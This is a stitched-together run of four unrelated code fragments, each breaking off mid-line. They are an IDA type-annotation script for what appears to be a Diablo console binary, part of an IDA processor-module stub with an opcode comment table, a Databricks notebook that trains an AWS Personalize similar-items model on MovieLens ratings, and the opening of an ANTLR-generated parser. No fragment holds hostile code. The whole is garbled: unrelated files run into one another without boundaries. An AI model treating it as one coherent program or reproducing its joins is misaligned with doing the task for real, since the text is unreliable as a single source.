del_items(0x801400CC) SetType(0x801400CC, "void AddFlamec__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x801401BC) SetType(0x801401BC, "void AddCbolt__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int micaster, int id, int dam)") del_items(0x801403B0) SetType(0x801403B0, "void AddHbolt__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int micaster, int id, int dam)") del_items(0x80140570) SetType(0x80140570, "void AddResurrect__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x801405E4) SetType(0x801405E4, "void AddResurrectBeam__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x8014066C) SetType(0x8014066C, "void AddTelekinesis__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x801406D4) SetType(0x801406D4, "void AddBoneSpirit__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x801408D0) SetType(0x801408D0, "void AddRportal__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x80140970) SetType(0x80140970, "void AddDiabApoca__Fiiiiiicii(int mi, int sx, int sy, int dx, int dy, int midir, int mienemy, int id, int dam)") del_items(0x80140AAC) SetType(0x80140AAC, "int AddMissile__Fiiiiiiciii(int sx, int sy, int v1, int v2, int midir, int mitype, int micaster, int id, int v3, int spllvl)") del_items(0x80140DF8) SetType(0x80140DF8, "int Sentfire__Fiii(int i, int sx, int sy)") del_items(0x80140FDC) SetType(0x80140FDC, "void MI_Dummy__Fi(int i)") del_items(0x80140FE4) SetType(0x80140FE4, "void MI_Golem__Fi(int i)") del_items(0x80141240) SetType(0x80141240, "void MI_SetManashield__Fi(int i)") del_items(0x8014127C) SetType(0x8014127C, "void MI_LArrow__Fi(int i)") del_items(0x80141A38) SetType(0x80141A38, "void MI_Arrow__Fi(int i)") del_items(0x80141C54) SetType(0x80141C54, "void MI_Firebolt__Fi(int i)") del_items(0x80142320) SetType(0x80142320, "void MI_Lightball__Fi(int i)") del_items(0x801425A8) SetType(0x801425A8, "void MI_Acidpud__Fi(int i)") del_items(0x801426B8) SetType(0x801426B8, "void MI_Firewall__Fi(int i)") del_items(0x8014297C) SetType(0x8014297C, "void MI_Fireball__Fi(int i)") del_items(0x80143340) SetType(0x80143340, "void MI_Lightctrl__Fi(int i)") del_items(0x801436BC) SetType(0x801436BC, "void MI_Lightning__Fi(int i)") del_items(0x801437A8) SetType(0x801437A8, "void MI_Town__Fi(int i)") del_items(0x801439E0) SetType(0x801439E0, "void MI_Flash__Fi(int i)") del_items(0x80143D34) SetType(0x80143D34, "void MI_Flash2__Fi(int i)") del_items(0x80143EFC) SetType(0x80143EFC, "void MI_Manashield__Fi(int i)") del_items(0x80144220) SetType(0x80144220, "void MI_Firemove__Fi(int i)") del_items(0x801444AC) SetType(0x801444AC, "void MI_Guardian__Fi(int i)") del_items(0x8014475C) SetType(0x8014475C, "void MI_Chain__Fi(int i)") del_items(0x801449C8) SetType(0x801449C8, "void MI_Misexp__Fi(int i)") del_items(0x80144CC8) SetType(0x80144CC8, "void MI_Acidsplat__Fi(int i)") del_items(0x80144E64) SetType(0x80144E64, "void MI_Teleport__Fi(int i)") del_items(0x8014522C) SetType(0x8014522C, "void MI_Stone__Fi(int i)") del_items(0x801453D8) SetType(0x801453D8, "void MI_Boom__Fi(int i)") del_items(0x801454D0) SetType(0x801454D0, "void MI_Rhino__Fi(int i)") del_items(0x8014587C) SetType(0x8014587C, "void MI_FirewallC__Fi(int i)") del_items(0x80145B04) SetType(0x80145B04, "void MI_Infra__Fi(int i)") del_items(0x80145BBC) SetType(0x80145BBC, "void MI_Apoca__Fi(int i)") del_items(0x80145E50) SetType(0x80145E50, "void MI_Wave__Fi(int i)") del_items(0x8014634C) SetType(0x8014634C, "void MI_Nova__Fi(int i)") del_items(0x8014660C) SetType(0x8014660C, "void MI_Flame__Fi(int i)") del_items(0x80146804) SetType(0x80146804, "void MI_Flamec__Fi(int i)") del_items(0x80146A8C) SetType(0x80146A8C, "void MI_Cbolt__Fi(int i)") del_items(0x80146D90) SetType(0x80146D90, "void MI_Hbolt__Fi(int i)") del_items(0x8014709C) SetType(0x8014709C, "void MI_Element__Fi(int i)") del_items(0x80147754) SetType(0x80147754, "void MI_Bonespirit__Fi(int i)") del_items(0x80147B5C) SetType(0x80147B5C, "void MI_ResurrectBeam__Fi(int i)") del_items(0x80147BCC) SetType(0x80147BCC, "void MI_Rportal__Fi(int i)") del_items(0x80147DF0) SetType(0x80147DF0, "void ProcessMissiles__Fv()") del_items(0x801481E4) SetType(0x801481E4, "void ClearMissileSpot__Fi(int mi)") del_items(0x8014829C) SetType(0x8014829C, "void MoveToScrollTarget__7CBlocks(struct CBlocks *this)") del_items(0x801482B0) SetType(0x801482B0, "void MonstPartJump__Fi(int m)") del_items(0x80148444) SetType(0x80148444, "void DeleteMonster__Fi(int i)") del_items(0x8014847C) SetType(0x8014847C, "int M_GetDir__Fi(int i)") del_items(0x801484D8) SetType(0x801484D8, "void M_StartDelay__Fii(int i, int len)") del_items(0x80148520) SetType(0x80148520, "void M_StartRAttack__Fiii(int i, int missile_type, int dam)") del_items(0x80148638) SetType(0x80148638,
in output file. 0 - empty file, -1 - write error """ r1 = qfile.write("Line 1\n") r2 = qfile.write("Line 2\n!") return 2 # two lines def create_func_frame(self, func_ea): """ Create a function frame for a newly created function. Set up frame size, its attributes etc. """ return False def is_far_jump(self, icode): """ Is indirect far jump or call instruction? meaningful only if the processor has 'near' and 'far' reference types """ return False def is_align_insn(self, ea): """ Is the instruction created only for alignment purposes? Returns: number of bytes in the instruction """ return 0 def outspec(self, ea, segtype): """ Generate text representation of an item in a special segment i.e. absolute symbols, externs, communal definitions etc. Returns: 1-overflow, 0-ok """ return 0 def get_frame_retsize(self, func_ea): """ Get size of function return address in bytes If this function is absent, the kernel will assume 4 bytes for 32-bit function 2 bytes otherwise """ return 3 def is_switch(self, swi): """ Find 'switch' idiom. Fills 'si' structure with information @return: Boolean (True if switch was found and False otherwise) """ return False def is_sp_based(self, op): """ Check whether the operand is relative to stack pointer or frame pointer. This function is used to determine how to output a stack variable This function may be absent. If it is absent, then all operands are sp based by default. Define this function only if some stack references use frame pointer instead of stack pointer. returns flags: OP_FP_BASED operand is FP based OP_SP_BASED operand is SP based OP_SP_ADD operand value is added to the pointer OP_SP_SUB operand value is substracted from the pointer """ return idaapi.OP_FP_BASED def notify_add_func(self, func_ea): """ The kernel has added a function. @param func_ea: function start EA @return: Nothing """ pass def notify_del_func(self, func_ea): """ The kernel is about to delete a function @param func_ea: function start EA @return: 1-ok,<=0-do not delete """ return 1 auto_comments = { "AD" : "add", "ADC" : "add with carry", "ADCI" : "add immediate with carry", "ADCIM" : "add immediate multi reg with", "ADCM" : "add multi reg with carry", "ADF" : "add floating point", "ADFM" : "add floating point multi reg", "ADI" : "add immediate", "ADIM" : "add immediate multi reg", "ADM" : "add multi reg", "AN" : "and", "ANI" : "and immediate", "ANM" : "and multi reg", "B" : "branch", "BE" : "branch on equal", "BF" : "bit flip", "BFM" : "bit flip multi reg", "BG" : "branch greater than", "BGE" : "branch greater than or equal", "BL" : "branch less than", "BLE" : "branch less than or equal", "BN" : "branch not equal", "BNO" : "branch not overflow", "BNS" : "branch not signed", "BO" : "branch on overflow", "BR" : "branch register", "BRA" : "branch absolute", "BRE" : "branch register on equal", "BRG" : "branch register on greater than", "BRGE" : "branch register on greater than or equal", "BRL" : "branch register on less than", "BRLE" : "branch register on less than or equal", "BRN" : "branch register on not equal", "BRNO" : "branch register on not overflow", "BRNS" : "branch register on not signed", "BRO" : "branch register on overflow", "BRR" : "branch relative", "BRS" : "branch register on signed", "BRSG" : "branch register on signed greater than", "BRSGE" : "branch register on signed greater than or equal", "BRSL" : "branch register on signed less than", "BRSLE" : "branch register on signed less than or equal", "BS" : "branch on signed", "BSG" : "branch on signed greater than", "BSGE" : "branch on signed greater than or equal", "BSL" : "branch on signed less than", "BSLE" : "branch on signed less than or equal", "C" : "call", "CAA" : "call absolute", "CAR" : "call relative", "CE" : "call on equal", "CG" : "call greater than", "CGE" : "call greater than or equal", "CL" : "call less than", "CLE" : "call less than or equal", "CM" : "compare", "CMF" : "compare floating point", "CMFM" : "compare floating point multi reg", "CMI" : "compare immediate", "CMIM" : "compare immediate multi reg", "CMM" : "compare multi reg", "CN" : "call not equal", "CNO" : "call not overflow", "CNS" : "call not signed", "CO" : "call on overflow", "CR" : "call register", "CRE" : "call register on equal", "CRG" : "call register greater than", "CRGE" : "call register greater than or equal", "CRL" : "call register less than", "CRLE" : "call register less than or equal", "CRN" : "call register not equal", "CRNO" : "call register not overflow", "CRNS" : "call register not signed", "CRO" : "call register on overflow", "CRS" : "call register on signed", "CRSG" : "call register on signed greater than", "CRSGE" : "call register on signed greater than or equal", "CRSL" : "call register on signed less than", "CRSLE" : "call register on signed less than or equal", "CS" : "call on signed", "CSG" : "call on signed greater than", "CSGE" : "call on signed greater than or equal", "CSL" : "call on signed less than", "CSLE" : "call on signed less than or equal", "DBRK" : "debug break", "DI" : "disable interrupts", "DMT" : "direct memory transfer", "DV" : "divide", "DVF" : "divide floating point", "DVFM" : "divide floating point multi reg", "DVI" : "divide immediate", "DVIM" : "divide immediate multi reg", "DVIS" : "divide immediate signed", "DVISM" : "divide immediate signed multi", "DVM" : "divide multi reg", "DVS" : "divide signed", "DVSM" : "divide signed multi reg", "EI" : "enable interrupts", "FTI" : "float to integer", "FTIM" : "float to integer multi reg", "HT" : "halt", "IR" : "interrupt return", "ITF" : "integer to float", "ITFM" : "integer to float multi reg", "LDS" : "load single", # "LDSD" : "load single and decrement", # "LDSI" : "load single and increment", "LDT" : "load tri", # "LDTD" : "load tri and decrement", # "LDTI" : "load tri and increment", "LDW" : "load word", # "LDWD" : "load word and decrement", # "LDWI" : "load word and increment", "MD" : "modulus", "MDF" : "modulus floating point", "MDFM" : "modulus floating point multi reg", "MDI" : "modulus immediate", "MDIM" : "modulus immediate multi reg", "MDIS" : "modulus immediate signed", "MDISM" : "modulus immediate signed multi", "MDM" : "modulus multi reg", "MDS" : "modulus signed", "MDSM" : "modulus signed multi reg", "MH" : "move high", "MI" : "move immediate tri-byte (macro for ML/MH)", "ML" : "move low", "MS" : "move low signed", "MU" : "multiply", "MUF" : "multiply floating point", "MUFM" : "multiply floating point multi reg", "MUI" : "multiply immediate", "MUIM" : "multiply immediate multi reg", "MUIS" : "multiply immediate signed", "MUISM" : "multiply immediate signed multi", "MUM" : "multiply multi reg", "MUS" : "multiply signed", "MUSM" : "multiply signed multi reg", "NG" : "negate", "NGF" : "negate floating point", "NGFM" : "negate floating point multi reg", "NGM" : "negate multi reg", "NT" : "not", "NTM" : "not multi reg", "OR" : "or", "ORI" : "or immediate", "ORM" : "or multi reg", "RE" : "return", "RF" : "read flags", "RL" : "rotate left", "RLI" : "rotate left immediate", "RLIM" : "rotate left immediate multi reg", "RLM" : "rotate left multi reg", "RMP" : "read memory protection", "RND" : "random", "RNDM" : "random multi reg", "RR" : "rotate right", "RRI" : "rotate right immediate", "RRIM" : "rotate right immediate multi reg", "RRM" : "rotate right multi reg", "SA" : "shift arithemetic right", "SAI" : "shift arithemetic right immediate", "SAIM" : "shift arithemetic right immediate multi reg", "SAM" : "shift arithemetic right multi reg", "SB" : "subtract", "SBC" : "subtract with carry", "SBCI" : "subtract immediate with carry", "SBCIM" : "subtract immediate multi reg", "SBCM" : "subtract multi reg with carry", "SBF" : "subtract floating point", "SBFM" : "subtract floating point multi reg", "SBI" : "subtract immediate", "SBIM" : "subtract immediate
# Databricks notebook source # MAGIC %md # MAGIC # Finding similar items + HPO # COMMAND ---------- # MAGIC %md # MAGIC This notebook follows a similar structure to the temporal holdout one, but uses aws-sims instead of HRNN. We look at the similar items found, and see if HPO helps improve things. # COMMAND ---------- import boto3, os import json import numpy as np import pandas as pd import time from botocore.exceptions import ClientError # COMMAND ---------- suffix = str(np.random.uniform())[4:9] # COMMAND ---------- bucket = "demo-sims-"+ suffix # replace with the name of your S3 bucket filename = "DEMO-sims.csv" # COMMAND ---------- !aws s3 mb s3://{bucket} # COMMAND ---------- personalize = boto3.client(service_name='personalize') personalize_runtime = boto3.client(service_name='personalize-runtime') # COMMAND ---------- # MAGIC %md # MAGIC # Download and process data # COMMAND ---------- !curl -O http://files.grouplens.org/datasets/movielens/ml-1m.zip !unzip -o ml-1m.zip # COMMAND ---------- data = pd.read_csv('./ml-1m/ratings.dat', sep='::', names=['USER_ID','ITEM_ID','RATING','TIMESTAMP']) pd.set_option('display.max_rows', 5) data # COMMAND ---------- # data = data[data['RATING'] > 3.6] # Use all data to predict view recommendations data = data[['USER_ID', 'ITEM_ID', 'TIMESTAMP']] # select columns that match the columns in the schema below print('unique users %d; unique items %d'%( len(data['USER_ID'].unique()), len(data['ITEM_ID'].unique()))) # COMMAND ---------- # MAGIC %md # MAGIC ## Upload data # COMMAND ---------- data.to_csv(filename, index=False) boto3.Session().resource('s3').Bucket(bucket).Object(filename).upload_file(filename) # COMMAND ---------- # MAGIC %md # MAGIC # Create Schema # COMMAND ---------- schema = { "type": "record", "name": "Interactions", "namespace": "com.amazonaws.personalize.schema", "fields": [ { "name": "USER_ID", "type": "string" }, { "name": "ITEM_ID", "type": "string" }, { "name": "TIMESTAMP", "type": "long" } ], "version": "1.0" } create_schema_response = personalize.create_schema( name = "DEMO-sims-schema-"+suffix, schema = json.dumps(schema) ) schema_arn = create_schema_response['schemaArn'] print(json.dumps(create_schema_response, indent=2)) # COMMAND ---------- # MAGIC %md # MAGIC ## Datasets and Dataset Groups # COMMAND ---------- # MAGIC %md # MAGIC ### Create a Dataset Group # COMMAND ---------- create_dataset_group_response = personalize.create_dataset_group( name = "DEMO-sims-dataset-group-"+suffix ) dataset_group_arn = create_dataset_group_response['datasetGroupArn'] print(json.dumps(create_dataset_group_response, indent=2)) # COMMAND ---------- status = None max_time = time.time() + 3*60*60 # 3 hours while time.time() < max_time: describe_dataset_group_response = personalize.describe_dataset_group( datasetGroupArn = dataset_group_arn ) status = describe_dataset_group_response["datasetGroup"]["status"] print("DatasetGroup: {}".format(status)) if status == "ACTIVE" or status == "CREATE FAILED": break time.sleep(20) # COMMAND ---------- # MAGIC %md # MAGIC ### Create an 'Interactions' Dataset Type # COMMAND ---------- dataset_type = "INTERACTIONS" create_dataset_response = personalize.create_dataset( datasetType = dataset_type, datasetGroupArn = dataset_group_arn, schemaArn = schema_arn, name = "DEMO-sims-dataset-"+suffix ) dataset_arn = create_dataset_response['datasetArn'] print(json.dumps(create_dataset_response, indent=2)) # COMMAND ---------- # MAGIC %md # MAGIC ## S3 Bucket Permissions for Personalize Access # COMMAND ---------- # MAGIC %md # MAGIC ### Attach a Policy to the S3 Bucket # COMMAND ---------- s3 = boto3.client("s3") policy = { "Version": "2012-10-17", "Id": "PersonalizeS3BucketAccessPolicy", "Statement": [ { "Sid": "PersonalizeS3BucketAccessPolicy", "Effect": "Allow", "Principal": { "Service": "personalize.amazonaws.com" }, "Action": [ "s3:GetObject", "s3:ListBucket" ], "Resource": [ "arn:aws:s3:::{}".format(bucket), "arn:aws:s3:::{}/*".format(bucket) ] } ] } s3.put_bucket_policy(Bucket=bucket, Policy=json.dumps(policy)); # COMMAND ---------- # MAGIC %md # MAGIC ### Create S3 Read-Only Access Role # COMMAND ---------- iam = boto3.client("iam") role_name = "PersonalizeS3Role-"+suffix assume_role_policy_document = { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "Service": "personalize.amazonaws.com" }, "Action": "sts:AssumeRole" } ] } try: create_role_response = iam.create_role( RoleName = role_name, AssumeRolePolicyDocument = json.dumps(assume_role_policy_document) ); iam.attach_role_policy( RoleName = role_name, PolicyArn = "arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess" ); role_arn = create_role_response["Role"]["Arn"] except ClientError as e: if e.response['Error']['Code'] == 'EntityAlreadyExists': role_arn = iam.get_role(RoleName=role_name)['Role']['Arn'] else: raise print(role_arn) # sometimes need to wait a bit for the role to be created time.sleep(45) print(role_arn) # COMMAND ---------- # MAGIC %md # MAGIC ## Dataset Import Jobs # COMMAND ---------- create_dataset_import_job_response = personalize.create_dataset_import_job( jobName = "DEMO-sims-dataset-import-job-"+suffix, datasetArn = dataset_arn, dataSource = { "dataLocation": "s3://{}/{}".format(bucket, filename) }, roleArn = role_arn ) dataset_import_job_arn = create_dataset_import_job_response['datasetImportJobArn'] print(json.dumps(create_dataset_import_job_response, indent=2)) # COMMAND ---------- # MAGIC %md # MAGIC ### Wait for Dataset Import Job and Dataset Import Job Run to Have ACTIVE Status # COMMAND ---------- status = None max_time = time.time() + 3*60*60 # 3 hours while time.time() < max_time: describe_dataset_import_job_response = personalize.describe_dataset_import_job( datasetImportJobArn = dataset_import_job_arn ) dataset_import_job = describe_dataset_import_job_response["datasetImportJob"] if "latestDatasetImportJobRun" not in dataset_import_job: status = dataset_import_job["status"] print("DatasetImportJob: {}".format(status)) else: status = dataset_import_job["latestDatasetImportJobRun"]["status"] print("LatestDatasetImportJobRun: {}".format(status)) if status == "ACTIVE" or status == "CREATE FAILED": break time.sleep(60) # COMMAND ---------- # MAGIC %md # MAGIC # Create Solution # COMMAND ---------- recipe_list = personalize.list_recipes() for recipe in recipe_list['recipes']: print(recipe['recipeArn']) # COMMAND ---------- # MAGIC %md # MAGIC There are many recipes for different scenarios. In this example, we only have interactions data, so we will choose one from the basic recipes. # MAGIC # MAGIC | Feasible? | Recipe | Description # MAGIC |-------- | -------- |:------------ # MAGIC | Y | aws-popularity-count | Calculates popularity of items based on count of events against that item in user-item interactions dataset. # MAGIC | Y | aws-hrnn | Predicts items a user will interact with. A hierarchical recurrent neural network which can model the temporal order of user-item interactions. # MAGIC | N - requires meta data | aws-hrnn-metadata | Predicts items a user will interact with. HRNN with additional features derived from contextual (user-item interaction metadata), user medata (user dataset) and item metadata (item dataset) # MAGIC | N - for bandits and requires meta data | aws-hrnn-coldstart | Predicts items a user will interact with. HRNN-metadata with with personalized exploration of new items. # MAGIC | N - for item-based queries | aws-sims | Computes items similar to a given item based on co-occurrence of item in same user history in user-item interaction dataset # MAGIC | N - for reranking a short list | aws-personalized-ranking | Reranks a list of items for a user. Trains on user-item interactions dataset. # MAGIC # MAGIC # MAGIC We (or autoML) can run all of these basic recipes and choose the best-performing model from internal metrics. We recommend comparisons, especially with popularity-baseline, to see the lifts in metrics via personalization. However, in this demo, we will pick one recipe - aws-sims, to illustrate smell tests. # COMMAND ---------- recipe_arn = "arn:aws:personalize:::recipe/aws-sims" # COMMAND ---------- create_solution_response = personalize.create_solution( name = "DEMO-sims-solution-"+suffix, datasetGroupArn = dataset_group_arn, recipeArn = recipe_arn, ) solution_arn = create_solution_response['solutionArn'] print(json.dumps(create_solution_response, indent=2)) # COMMAND ---------- create_solution_version_response = personalize.create_solution_version( solutionArn = solution_arn ) solution_version_arn = create_solution_version_response['solutionVersionArn'] print(json.dumps(create_solution_version_response, indent=2)) # COMMAND ---------- # MAGIC %md # MAGIC ### Wait for Solution Version to Have ACTIVE Status # COMMAND ---------- status = None max_time = time.time() + 3*60*60 # 3 hours while time.time() < max_time: describe_solution_version_response = personalize.describe_solution_version( solutionVersionArn = solution_version_arn ) status = describe_solution_version_response["solutionVersion"]["status"] print("SolutionVersion: {}".format(status)) if status == "ACTIVE" or status == "CREATE FAILED": break time.sleep(60) # COMMAND ---------- # MAGIC %md # MAGIC ### Get Metrics of Solution # COMMAND ---------- get_metrics_response = personalize.get_solution_metrics( solutionVersionArn = solution_version_arn ) print(json.dumps(get_metrics_response, indent=2)) # COMMAND ---------- # MAGIC %md # MAGIC # Create and Wait for Campaign # COMMAND ---------- create_campaign_response = personalize.create_campaign( name = "DEMO-sims-campaign-"+suffix, solutionVersionArn = solution_version_arn, minProvisionedTPS = 2, ) campaign_arn = create_campaign_response['campaignArn'] print(json.dumps(create_campaign_response, indent=2)) # COMMAND ---------- # MAGIC %md # MAGIC ### Wait for Campaign to Have ACTIVE Status # COMMAND ---------- status = None max_time = time.time() + 3*60*60 # 3 hours while time.time() < max_time: describe_campaign_response = personalize.describe_campaign( campaignArn = campaign_arn ) status = describe_campaign_response["campaign"]["status"] print("Campaign: {}".format(status)) if status == "ACTIVE" or status == "CREATE FAILED": break time.sleep(60) # COMMAND ---------- # MAGIC %md # MAGIC ## to aid in interpretation, lets look at some items # COMMAND ---------- movies = pd.read_csv('./ml-1m/movies.dat', sep='::', names=['ITEM_ID','title','genre']) # COMMAND ---------- movies=movies.set_index('ITEM_ID') # COMMAND ---------- movies.head() # COMMAND ---------- # MAGIC %md # MAGIC ### Pick a couple of items and look at if items found are generally of similar genres # COMMAND ---------- # MAGIC %md # MAGIC Note, the model did not use this meta-data (genre) for training, this is a sanity or smell test to see if the model discovered similar items that 'make sense' # COMMAND ---------- rec_response = personalize_runtime.get_recommendations( campaignArn = campaign_arn, itemId = str(5) ) rec_items = [int(x['itemId']) for x in rec_response['itemList']] # COMMAND ---------- movies.loc[rec_items[:5]] # COMMAND ---------- rec_response = personalize_runtime.get_recommendations( campaignArn = campaign_arn, itemId = str(2) ) rec_items = [int(x['itemId']) for x in rec_response['itemList']] # COMMAND ---------- movies.loc[rec_items[:5]] # COMMAND ---------- # MAGIC %md # MAGIC ## Do HPO # COMMAND ---------- # MAGIC %md # MAGIC We now see if doing HPO improves things # COMMAND ---------- create_solution_response = personalize.create_solution( name = "DEMO-sims-solution-hpo-"+suffix, datasetGroupArn = dataset_group_arn, recipeArn = recipe_arn, performHPO = True, solutionConfig={ 'hpoConfig': { 'hpoResourceConfig': { 'maxNumberOfTrainingJobs': '40', 'maxParallelTrainingJobs': '10' } } } ) solution_arn = create_solution_response['solutionArn'] print(json.dumps(create_solution_response, indent=2)) # COMMAND ---------- create_solution_version_response = personalize.create_solution_version( solutionArn = solution_arn ) solution_version_arn = create_solution_version_response['solutionVersionArn'] print(json.dumps(create_solution_version_response, indent=2)) # COMMAND ---------- status = None max_time = time.time() + 3*60*60 # 3 hours while time.time() < max_time: describe_solution_version_response = personalize.describe_solution_version( solutionVersionArn = solution_version_arn ) status = describe_solution_version_response["solutionVersion"]["status"] print("SolutionVersion: {}".format(status)) if status == "ACTIVE" or status == "CREATE FAILED": break time.sleep(60) # COMMAND ---------- get_metrics_response = personalize.get_solution_metrics( solutionVersionArn = solution_version_arn ) print(json.dumps(get_metrics_response, indent=2)) # COMMAND ---------- movies.head() # COMMAND ---------- rec_response = personalize_runtime.get_recommendations( campaignArn = campaign_arn, itemId = str(5) ) rec_items = [int(x['itemId']) for x in rec_response['itemList']] movies.loc[rec_items[:5]] # COMMAND ---------- rec_response = personalize_runtime.get_recommendations( campaignArn
<filename>assignment/assignment1/main/mc/parser/.antlr/MCParser.py # Generated from /home/kraken/ppl-course/assignment/assignment1/main/mc/parser/MC.g4 by ANTLR 4.7.1 # encoding: utf-8 from antlr4 import * from io import StringIO from typing.io import TextIO import sys def serializedATN(): with StringIO() as buf: buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\3\63") buf.write("\u012f\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7\t\7") buf.write("\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r\4\16") buf.write("\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23\t\23") buf.write("\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30\4\31") buf.write("\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36\t\36") buf.write("\4\37\t\37\4 \t \4!\t!\4\"\t\"\3\2\3\2\6\2G\n\2\r\2\16") buf.write("\2H\3\2\3\2\3\3\3\3\3\3\3\3\3\4\3\4\3\5\3\5\3\5\7\5V\n") buf.write("\5\f\5\16\5Y\13\5\3\6\3\6\3\6\3\6\5\6_\n\6\3\7\3\7\3\7") buf.write("\3\7\5\7e\n\7\3\7\3\7\3\7\3\b\3\b\3\b\5\bm\n\b\3\t\3\t") buf.write("\3\t\3\t\3\n\3\n\3\n\7\nv\n\n\f\n\16\ny\13\n\3\13\3\13") buf.write("\3\13\3\f\3\f\3\f\5\f\u0081\n\f\3\r\3\r\3\r\7\r\u0086") buf.write("\n\r\f\r\16\r\u0089\13\r\3\r\3\r\3\16\3\16\3\16\3\16\3") buf.write("\16\3\16\3\16\3\16\5\16\u0095\n\16\3\17\3\17\3\17\3\17") buf.write("\3\17\3\17\3\17\5\17\u009e\n\17\3\20\3\20\6\20\u00a2\n") buf.write("\20\r\20\16\20\u00a3\3\20\3\20\3\20\3\20\3\21\3\21\3\21") buf.write("\3\21\3\21\3\21\3\21\3\21\3\21\3\21\3\22\3\22\3\22\3\23") buf.write("\3\23\3\23\3\24\3\24\5\24\u00bc\n\24\3\24\3\24\3\25\3") buf.write("\25\3\25\3\26\3\26\3\26\3\26\3\26\5\26\u00c8\n\26\3\27") buf.write("\3\27\3\27\3\27\3\27\3\27\7\27\u00d0\n\27\f\27\16\27\u00d3") buf.write("\13\27\3\30\3\30\3\30\3\30\3\30\3\30\7\30\u00db\n\30\f") buf.write("\30\16\30\u00de\13\30\3\31\3\31\3\31\3\31\3\31\5\31\u00e5") buf.write("\n\31\3\32\3\32\3\32\3\32\3\32\5\32\u00ec\n\32\3\33\3") buf.write("\33\3\33\3\33\3\33\3\33\7\33\u00f4\n\33\f\33\16\33\u00f7") buf.write("\13\33\3\34\3\34\3\34\3\34\3\34\3\34\7\34\u00ff\n\34\f") buf.write("\34\16\34\u0102\13\34\3\35\3\35\3\35\5\35\u0107\n\35\3") buf.write("\36\3\36\3\36\3\36\3\36\3\36\5\36\u010f\n\36\3\37\3\37") buf.write("\3\37\3\37\3\37\5\37\u0116\n\37\3 \3 \3 \3 \3 \3 \5 \u011e") buf.write("\n \3!\3!\3!\3!\3!\3\"\3\"\3\"\7\"\u0128\n\"\f\"\16\"") buf.write("\u012b\13\"\5\"\u012d\n\"\3\"\2\6,.\64\66#\2\4\6\b\n\f") buf.write("\16\20\22\24\26\30\32\34\36 \"$&(*,.\60\62\64\668:<>@") buf.write("B\2\b\3\2\7\n\3\2\37 \3\2!$\3\2\27\30\3\2\31\33\4\2\30") buf.write("\30\34\34\2\u0133\2F\3\2\2\2\4L\3\2\2\2\6P\3\2\2\2\bR") buf.write("\3\2\2\2\nZ\3\2\2\2\f`\3\2\2\2\16l\3\2\2\2\20n\3\2\2\2") buf.write("\22r\3\2\2\2\24z\3\2\2\2\26}\3\2\2\2\30\u0082\3\2\2\2") buf.write("\32\u0094\3\2\2\2\34\u0096\3\2\2\2\36\u009f\3\2\2\2 \u00a9") buf.write("\3\2\2\2\"\u00b3\3\2\2\2$\u00b6\3\2\2\2&\u00b9\3\2\2\2") buf.write("(\u00bf\3\2\2\2*\u00c7\3\2\2\2,\u00c9\3\2\2\2.\u00d4\3") buf.write("\2\2\2\60\u00e4\3\2\2\2\62\u00eb\3\2\2\2\64\u00ed\3\2") buf.write("\2\2\66\u00f8\3\2\2\28\u0106\3\2\2\2:\u010e\3\2\2\2<\u0115") buf.write("\3\2\2\2>\u011d\3\2\2\2@\u011f\3\2\2\2B\u012c\3\2\2\2") buf.write("DG\5\4\3\2EG\5\f\7\2FD\3\2\2\2FE\3\2\2\2GH\3\2\2\2HF\3") buf.write("\2\2\2HI\3\2\2\2IJ\3\2\2\2JK\7\2\2\3K\3\3\2\2\2LM\5\6") buf.write("\4\2MN\5\b\5\2NO\7-\2\2O\5\3\2\2\2PQ\t\2\2\2Q\7\3\2\2") buf.write("\2RW\5\n\6\2ST\7,\2\2TV\5\b\5\2US\3\2\2\2VY\3\2\2\2WU") buf.write("\3\2\2\2WX\3\2\2\2X\t\3\2\2\2YW\3\2\2\2Z^\7\26\2\2[\\") buf.write("\7*\2\2\\]\7\3\2\2]_\7+\2\2^[\3\2\2\2^_\3\2\2\2_\13\3") buf.write("\2\2\2`a\5\16\b\2ab\7\26\2\2bd\7&\2\2ce\5\22\n\2dc\3\2") buf.write("\2\2de\3\2\2\2ef\3\2\2\2fg\7\'\2\2gh\5\30\r\2h\r\3\2\2") buf.write("\2im\5\6\4\2jm\5\20\t\2km\7\13\2\2li\3\2\2\2lj\3\2\2\2") buf.write("lk\3\2\2\2m\17\3\2\2\2no\5\6\4\2op\7*\2\2pq\7+\2\2q\21") buf.write("\3\2\2\2rw\5\24\13\2st\7,\2\2tv\5\24\13\2us\3\2\2\2vy") buf.write("\3\2\2\2wu\3\2\2\2wx\3\2\2\2x\23\3\2\2\2yw\3\2\2\2z{\5") buf.write("\6\4\2{|\5\26\f\2|\25\3\2\2\2}\u0080\7\26\2\2~\177\7*") buf.write("\2\2\177\u0081\7+\2\2\u0080~\3\2\2\2\u0080\u0081\3\2\2") buf.write("\2\u0081\27\3\2\2\2\u0082\u0087\7(\2\2\u0083\u0086\5\4") buf.write("\3\2\u0084\u0086\5\32\16\2\u0085\u0083\3\2\2\2\u0085\u0084") buf.write("\3\2\2\2\u0086\u0089\3\2\2\2\u0087\u0085\3\2\2\2\u0087") buf.write("\u0088\3\2\2\2\u0088\u008a\3\2\2\2\u0089\u0087\3\2\2\2") buf.write("\u008a\u008b\7)\2\2\u008b\31\3\2\2\2\u008c\u0095\5\30") buf.write("\r\2\u008d\u0095\5\34\17\2\u008e\u0095\5\36\20\2\u008f") buf.write("\u0095\5 